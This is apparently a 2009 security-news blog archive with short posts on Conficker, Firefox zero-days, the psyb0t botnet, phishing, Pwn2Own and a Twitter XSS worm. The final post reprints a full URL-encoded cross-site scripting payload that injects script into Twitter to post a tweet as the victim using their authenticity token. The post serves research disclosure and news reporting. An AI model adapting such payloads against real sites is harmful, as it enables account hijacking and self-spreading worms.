Archive

Archive for March, 2009

Conficker Around The World

picture-11

[ http://www.worldtimezone.com/ ]

It’s now April 01 in New Zealand and in few minutes here in Australia then followed by Asia, Africa, Europe and America. This high profile internet worm will start triggering its payload which is the generation of 50,000 domain names. However, it will only choose 500 randomly to call home. 

Everyone is eyeing for what’s next.

Another Firefox Zero Day

firefoxzeroday

Just couple of days, Mozilla Firefox XSL Parsing Remote Memory Corruption PoC 0day and yesterday another one – Firefox 3.0.x (XML Parser) Memory Corruption / DoS PoC.

This vulnerabilities does NOT affect Mac OS X.

Linux Worm “Psyb0t”

More information has surfaced about the botnet “psyb0t,” the first known to be capable of directly infecting home routers and cable/DSL modems.

It was first observed infecting a Netcomm NB5 modem/router in Australia.

Further read @ http://blogs.zdnet.com/BTL/?p=15197

Further read @ http://www.dronebl.org/blog/8

Analysis @  http://www.adam.com.au/bogaurd/PSYB0T.pdf

Phishing OptusMail

optus1

Phishers targeting Optus – one of the biggest telecom in Australia.

CanSecWest PWN2OWN Hacks Mac in 10seconds

Last year’s CanSecWest PWN2OWN successfully hacked Mac OS X in 2 minutes, but this year it’s a whooping 10 seconds!

From interview , he described “I gave them the link, they clicked on it, and that was it,” said Miller. “I did a few things to show that I had full control of the Mac.”

He walked off with a $5,000 cash prize and the MacBook he hacked.

Apparently, just last year the attack went succesful by targetting Safari + internet connection.

This give us a clear picture on what attack vector could easily get onto users’ computer.

Not surprising that we are now bombarded with Internet threats!

Conficker.C Analysis

Good job from SRI for making this paper publicly available!

>> http://mtc.sri.com/Conficker/addendumC/

Twitter Viral XSS

@ Researchers Make Wormy Twitter Attack

>> http://www.pcworld.com/businesscenter/article/161631/researchers_make_wormy_twitter_attack.html

@ http://www.securescience.net/twoubledtwitter.html

—————————————————————————————————-

<html>
Link for Twitter Viral XSS Proof of Concept:
<p><a href=”http://twitter.com/help/request_source?device_source%5Bname%5D=%3Cscript%3Eif%28confirm%28%22Combining+Twitter+and+it%27s+viral+market+affect%2C+an+attacker+could+do+much+more+than+our+simple+proof+of+concept%2E+

They+could+use+this+to+infect+massive+amounts+of+twitter+users+within+hours+using+remote+exploit+code%2C+as+well+as+steal+their+twitter

+account+information%2C+all+without+the+victims+knowledge%2E%5Cn%5CnIf+you+proceed%2C+a+tweet+will+be+posted+automatically+AS+YOURSELF%2E+The+contents+of+this+tweet+is+innocuous+but

+demonstrates+the+viral+capabilities%2E+By+clicking+OK+you+will+demonstrate+this+flaw%2E+Clicking+cancel+will+leave+this+demonstration

+without+any+effects%2E%22%29%29%7Ba%3Dfunction%28p%2Ct%2Cn%29%7Bvar+o%3Ddocument%2EcreateElement%28t%29%3Bif%28n%29%7Bo%2Etype%3D%22hidden%22%3Bo%2Ename%3Dn%7D%3Bp%2EappendChild%28o%29%3Breturn+o%3B%7D%3Bf%3Da%28document%2Ebody%2C%22form%22%29%3Bf%2Eaction%3D%22%2Fstatus%2Fupdate%22%3Bf%2Emethod%3D%22POST%22%3Ba%28f%2C%22input%22%2C%22authenticity%5Ftoken%22%29%2Evalue%3Dtwttr%2Eform%5Fauthenticity%5Ftoken%3Ba%28f%2C%22input%22%2C%22status%22%29%2Evalue%3D%22%40XSSExploits+I+just+got+owned%21%22%3Bf%2Esubmit%28%29%3B%7Delse%7Blocation%2Ehref%3D%22http%3A%2F%2Fwww%2Esecurescience%2Ecom%2F%22%7D%3C%2Fscript%3E”>Link</a>
<p>Link is benign, accompanied with a choice of whether you want to be exploited or not, and an explanation of the process. If you accept, your account will have posted a reply to XSSExploits with “I just got owned!”.
<p>
For more on how severe XSS can get please read <a href=”http://www.securescience.com/FILES/securescience/10237/335_PH_EXP_05.pdf”>Chapter 5</a> of Phishing Exposed.
<p> Research conducted by Lance James and Eric Wastl

</html>

—————————————————————————————————-

Take note that this is NOT platform dependent.  I hope attackers will not take advantage of this code!